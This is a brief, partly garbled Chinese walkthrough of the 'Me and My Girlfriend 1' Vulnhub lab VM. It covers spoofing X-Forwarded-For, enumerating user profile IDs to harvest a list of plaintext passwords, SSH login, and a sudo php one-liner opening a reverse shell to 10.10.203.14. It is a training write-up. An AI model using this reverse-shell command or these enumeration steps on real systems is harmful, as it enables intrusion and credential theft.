Girlfreind:1 Vulnhub Walkthrough
靶機連接:php
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/web
主機掃描:ssh
HTTP 目錄訪問,提示無權限,右鍵源碼,提示XXF便可3d
正常訪問,註冊一個用戶,登陸,而後查看用戶profile,經過id進行遍歷枚舉用戶密碼blog
eweuhtandingan skuyatuh
sedihaingmah cedihhihihi
aingmaung qwerty!!!
abdikasepak dorrrrr
sundatea indONEsia
alice 4lic3
pentest pentest源碼
經過注意登陸web,無發現上傳的點test
而後經過ssh嘗試登陸登錄
提權操做sed
sudo /usr/bin/php -r '$sock=fsockopen("10.10.203.14",1234);exec("/bin/sh -i <&3 >&3 2>&3");'date
OVER !!
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough
- 更多相關文章...
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 融合阿里雲,牛客助您找到心儀好工作
- 2. 解決jdbc(jdbctemplate)在測試類時不報錯在TomCatb部署後報錯
- 3. 解決PyCharm GoLand IntelliJ 等 JetBrains 系列 IDE無法輸入中文
- 4. vue+ant design中關於圖片請求不顯示的問題。
- 5. insufficient memory && Native memory allocation (malloc) failed
- 6. 解決IDEA用Maven創建的Web工程不能創建Java Class文件的問題
- 7. [已解決] Error: Cannot download ‘https://start.spring.io/starter.zip?
- 8. 在idea讓java文件夾正常使用
- 9. Eclipse啓動提示「subversive connector discovery」
- 10. 帥某-技巧-快速轉帖博主文章(article_content)
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Happycorp:1 Vulnhub Walkthrough
- 6. Sunset: Nightfall Vulnhub Walkthrough
- 7. HA: Chanakya Vulnhub Walkthrough
- 8. HA Joker Vulnhub Walkthrough
- 9. Matrix-3: Vulnhub Walkthrough
- 10. Sunset: Vulnhub Walkthrough